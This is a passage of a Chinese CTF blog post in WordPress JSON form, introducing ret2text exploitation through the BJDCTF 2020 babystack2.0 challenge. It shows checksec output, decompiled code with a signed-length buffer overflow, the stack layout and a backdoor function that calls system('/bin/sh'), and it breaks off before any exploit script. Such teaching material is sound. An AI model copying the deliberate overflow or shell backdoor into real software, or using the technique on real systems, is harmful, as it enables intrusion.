{"id":149,"date":"2025-04-29T13:45:00","date_gmt":"2025-04-29T05:45:00","guid":{"rendered":"http:\/\/www.triode.cc\/?p=149"},"modified":"2025-09-28T13:29:22","modified_gmt":"2025-09-28T05:29:22","slug":"pwn1-ret2xxx","status":"publish","type":"post","link":"https:\/\/www.triode.cc\/index.php\/2025\/04\/29\/pwn1-ret2xxx\/","title":{"rendered":"Pwn\u7b14\u8bb0(1) ret2\u7cfb\u5217"},"content":{"rendered":"\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p>\u60f3\u4e86\u4e00\u4e0b\uff0c\u8fd8\u662f\u628a\u4e4b\u524d\u5b66\u7684\u4e00\u70b9Pwn\u653e\u4e0a\u6765\u5427\uff0c\u672c\u6587\u7684\u4f8b\u9898\u90fd\u662f64\u4f4d\u7684\u7a0b\u5e8f\uff0c\u8fd9\u4e9b\u6280\u672f\u572832\u4f4d\u7a0b\u5e8f\u4e0a\u5b9e\u9645\u4e0a\u4e5f\u662f\u7c7b\u4f3c\u7684<\/p>\n<\/blockquote>\n\n\n\n<h2 class=\"wp-block-heading\">ret2text<\/h2>\n\n\n\n<p>ret2text\u662f\u63a7\u5236\u7a0b\u5e8f\u6267\u884c\u7a0b\u5e8f\u672c\u8eab\u5df2\u7ecf\u6709\u7684\u4ee3\u7801\uff08\u5373<code>.text<\/code>\u6bb5\u7684\u4ee3\u7801\uff09\uff0c\u5728\u63a7\u5236\u7a0b\u5e8f\u6267\u884c\u4ee3\u7801\u7684\u65f6\u5019\u4e5f\u53ef\u4ee5\u6267\u884c\u51e0\u6bb5\u4e0d\u8fde\u7eed\u7684\u5df2\u6709\u4ee3\u7801\uff08\u5373gadgets\uff09\uff0c\u8fd9\u65f6\uff0c\u6211\u4eec\u9700\u8981\u77e5\u9053\u5bf9\u5e94\u8fd4\u56de\u7684\u4ee3\u7801\u7684\u4f4d\u7f6e\u3002\u5f53\u7136\u7a0b\u5e8f\u4e5f\u53ef\u80fd\u4f1a\u5f00\u542f\u67d0\u4e9b\u4fdd\u62a4\uff0c\u6211\u4eec\u9700\u8981\u60f3\u529e\u6cd5\u53bb\u7ed5\u8fc7\u8fd9\u4e9b\u4fdd\u62a4\u3002<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">\u4f8b\uff1a[BJDCTF 2020]babystack2.0<\/h4>\n\n\n\n<p>\u9898\u76ee\uff1a<a href=\"https:\/\/www.nssctf.cn\/problem\/709\">BJDCTF 2020-babystack2.0 | NSSCTF<\/a><\/p>\n\n\n\n<p>checksec\u53ef\u4ee5\u77e5\u9053\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>Arch:     amd64\nRELRO:    Partial RELRO\nStack:    No canary found\nNX:       NX enabled\nPIE:      No PIE (0x400000)<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #88C0D0\">Arch:<\/span><span style=\"color: #D8DEE9FF\">     <\/span><span style=\"color: #A3BE8C\">amd64<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">RELRO:<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #A3BE8C\">Partial<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">RELRO<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">Stack:<\/span><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #A3BE8C\">No<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">canary<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">found<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">NX:<\/span><span style=\"color: #D8DEE9FF\">       <\/span><span style=\"color: #A3BE8C\">NX<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">enabled<\/span><\/span>\n<span class=\"line\"><span style=\"color: #88C0D0\">PIE:<\/span><span style=\"color: #D8DEE9FF\">      <\/span><span style=\"color: #A3BE8C\">No<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #A3BE8C\">PIE<\/span><span style=\"color: #D8DEE9FF\"> (0x400000)<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u6ca1\u6709Canary\u548cPIE\uff0c\u4f46\u662f\u5b58\u5728NX\u4fdd\u62a4.<\/p>\n\n\n\n<p>\u7528IDA\u6253\u5f00\u9644\u4ef6\uff0c\u53ef\u4ee5\u770b\u5230\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  char buf&#91;12&#93;; \/\/ &#91;rsp+0h&#93; &#91;rbp-10h&#93; BYREF\n  size_t nbytes; \/\/ &#91;rsp+Ch&#93; &#91;rbp-4h&#93; BYREF\n\n  setvbuf(_bss_start, 0LL, 2, 0LL);\n  setvbuf(stdin, 0LL, 1, 0LL);\n  LODWORD(nbytes) = 0;\n  puts(\"**********************************\");\n  puts(\"*     Welcome to the BJDCTF!     *\");\n  puts(\"* And Welcome to the bin world!  *\");\n  puts(\"*  Let's try to pwn the world!   *\");\n  puts(\"* Please told me u answer loudly!*\");\n  puts(\"&#91;+&#93;Are u ready?\");\n  puts(\"&#91;+&#93;Please input the length of your name:\");\n  __isoc99_scanf(\"%d\", &amp;nbytes);\n  if ( (int)nbytes > 10 )\n  {\n    puts(\"Oops,u name is too long!\");\n    exit(-1);\n  }\n  puts(\"&#91;+&#93;What's u name?\");\n  read(0, buf, (unsigned int)nbytes);\n  return 0;\n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #D8DEE9FF\"> __cdecl <\/span><span style=\"color: #88C0D0\">main<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #D8DEE9\">argc<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">const<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">char<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">**<\/span><span style=\"color: #D8DEE9\">argv<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">const<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">char<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">**<\/span><span style=\"color: #D8DEE9\">envp<\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">char<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">&#91;<\/span><span style=\"color: #B48EAD\">12<\/span><span style=\"color: #ECEFF4\">&#93;<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #616E88\"> \/\/ &#91;rsp+0h&#93; &#91;rbp-10h&#93; BYREF<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">size_t<\/span><span style=\"color: #D8DEE9FF\"> nbytes<\/span><span style=\"color: #81A1C1\">;<\/span><span style=\"color: #616E88\"> \/\/ &#91;rsp+Ch&#93; &#91;rbp-4h&#93; BYREF<\/span><\/span>\n<span class=\"line\"><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">setvbuf<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">_bss_start<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">2<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">setvbuf<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">stdin<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">LL<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">LODWORD<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\">nbytes<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">=<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">**********************************<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">*     Welcome to the BJDCTF!     *<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">* And Welcome to the bin world!  *<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">*  Let&#39;s try to pwn the world!   *<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">* Please told me u answer loudly!*<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93;Are u ready?<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93;Please input the length of your name:<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">__isoc99_scanf<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">%d<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">&amp;<\/span><span style=\"color: #D8DEE9FF\">nbytes<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">if<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">nbytes <\/span><span style=\"color: #81A1C1\">&gt;<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">10<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #ECEFF4\">{<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">Oops,u name is too long!<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">    <\/span><span style=\"color: #88C0D0\">exit<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">-<\/span><span style=\"color: #B48EAD\">1<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #ECEFF4\">}<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">puts<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #A3BE8C\">&#91;+&#93;What&#39;s u name?<\/span><span style=\"color: #ECEFF4\">&quot;<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #88C0D0\">read<\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> buf<\/span><span style=\"color: #ECEFF4\">,<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #ECEFF4\">(<\/span><span style=\"color: #81A1C1\">unsigned<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #81A1C1\">int<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #D8DEE9FF\">nbytes<\/span><span style=\"color: #ECEFF4\">)<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">  <\/span><span style=\"color: #81A1C1\">return<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">0<\/span><span style=\"color: #81A1C1\">;<\/span><\/span>\n<span class=\"line\"><span style=\"color: #ECEFF4\">}<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u53ef\u4ee5\u770b\u5230\u5982\u4e0b\u6808\uff0c\u6211\u4eec\u7684\u76ee\u7684\u662f\u8fd4\u56de\u5730\u5740\uff08\u4e5f\u5c31\u662fIDA\u53d8\u91cf\u6808\u4e2d\u6807\u6ce8<code>r<\/code>\u7684\u5730\u65b9\uff0c\u90a3\u91cc\u5b9e\u9645\u4e0a\u662f<code>main<\/code>\u7684\u8fd4\u56de\u5730\u5740\uff09<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>-0000000000000010 buf             db 12 dup(?)\n-0000000000000004 nbytes          dq ?\n+0000000000000004                 db ? ; undefined\n+0000000000000005                 db ? ; undefined\n+0000000000000006                 db ? ; undefined\n+0000000000000007                 db ? ; undefined\n+0000000000000008  r              db 8 dup(?)\n+0000000000000010\n+0000000000000010 ; end of stack variables<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" tabindex=\"0\"><code><span class=\"line\"><span style=\"color: #D8DEE9FF\">-<\/span><span style=\"color: #B48EAD\">0000000000000010<\/span><span style=\"color: #D8DEE9FF\"> buf             <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">12<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">dup<\/span><span style=\"color: #D8DEE9FF\">(?)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">-<\/span><span style=\"color: #B48EAD\">0000000000000004<\/span><span style=\"color: #D8DEE9FF\"> nbytes          <\/span><span style=\"color: #81A1C1\">dq<\/span><span style=\"color: #D8DEE9FF\"> ?<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000004<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? <\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000005<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? <\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000006<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? <\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000007<\/span><span style=\"color: #D8DEE9FF\">                 <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> ? <\/span><span style=\"color: #616E88\">; undefined<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000008<\/span><span style=\"color: #D8DEE9FF\">  r              <\/span><span style=\"color: #81A1C1\">db<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #B48EAD\">8<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #88C0D0\">dup<\/span><span style=\"color: #D8DEE9FF\">(?)<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000010<\/span><\/span>\n<span class=\"line\"><span style=\"color: #D8DEE9FF\">+<\/span><span style=\"color: #B48EAD\">0000000000000010<\/span><span style=\"color: #D8DEE9FF\"> <\/span><span style=\"color: #616E88\">; end of stack variables<\/span><\/span><\/code><\/pre><\/div>\n\n\n\n<p>\u540c\u65f6\u7a0b\u5e8f\u63d0\u4f9b\u4e86\u4e00\u4e2a\u540e\u95e8\uff1a<\/p>\n\n\n\n<div class=\"wp-block-kevinbatdorf-code-block-pro\" data-code-block-pro-font-family=\"Code-Pro-JetBrains-Mono\" style=\"font-size:.875rem;font-family:Code-Pro-JetBrains-Mono,ui-monospace,SFMono-Regular,Menlo,Monaco,Consolas,monospace;line-height:1.25rem;--cbp-tab-width:2;tab-size:var(--cbp-tab-width, 2)\"><span style=\"display:block;padding:16px 0 0 16px;margin-bottom:-1px;width:100%;text-align:left;background-color:#2e3440ff\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"54\" height=\"14\" viewBox=\"0 0 54 14\"><g fill=\"none\" fill-rule=\"evenodd\" transform=\"translate(1 1)\"><circle cx=\"6\" cy=\"6\" r=\"6\" fill=\"#FF5F56\" stroke=\"#E0443E\" stroke-width=\".5\"><\/circle><circle cx=\"26\" cy=\"6\" r=\"6\" fill=\"#FFBD2E\" stroke=\"#DEA123\" stroke-width=\".5\"><\/circle><circle cx=\"46\" cy=\"6\" r=\"6\" fill=\"#27C93F\" stroke=\"#1AAB29\" stroke-width=\".5\"><\/circle><\/g><\/svg><\/span><span role=\"button\" tabindex=\"0\" style=\"color:#d8dee9ff;display:none\" aria-label=\"\u590d\u5236\" class=\"code-block-pro-copy-button\"><pre class=\"code-block-pro-copy-button-pre\" aria-hidden=\"true\"><textarea class=\"code-block-pro-copy-button-textarea\" tabindex=\"-1\" aria-hidden=\"true\" readonly>__int64 backdoor()  \n{  \n  system(\"\/bin\/sh\");  \n  return 1LL;  \n}<\/textarea><\/pre><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" style=\"width:24px;height:24px\" fill=\"none\" viewBox=\"0 0 24 24\" stroke=\"currentColor\" stroke-width=\"2\"><path class=\"with-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2m-6 9l2 2 4-4\"><\/path><path class=\"without-check\" stroke-linecap=\"round\" stroke-linejoin=\"round\" d=\"M9 5H7a2 2 0 00-2 2v12a2 2 0 002 2h10a2 2 0 002-2V7a2 2 0 00-2-2h-2M9 5a2 2 0 002 2h2a2 2 0 002-2M9 5a2 2 0 012-2h2a2 2 0 012 2\"><\/path><\/svg><\/span><pre class=\"shiki nord\" style=\"background-color: #2e3440ff\" 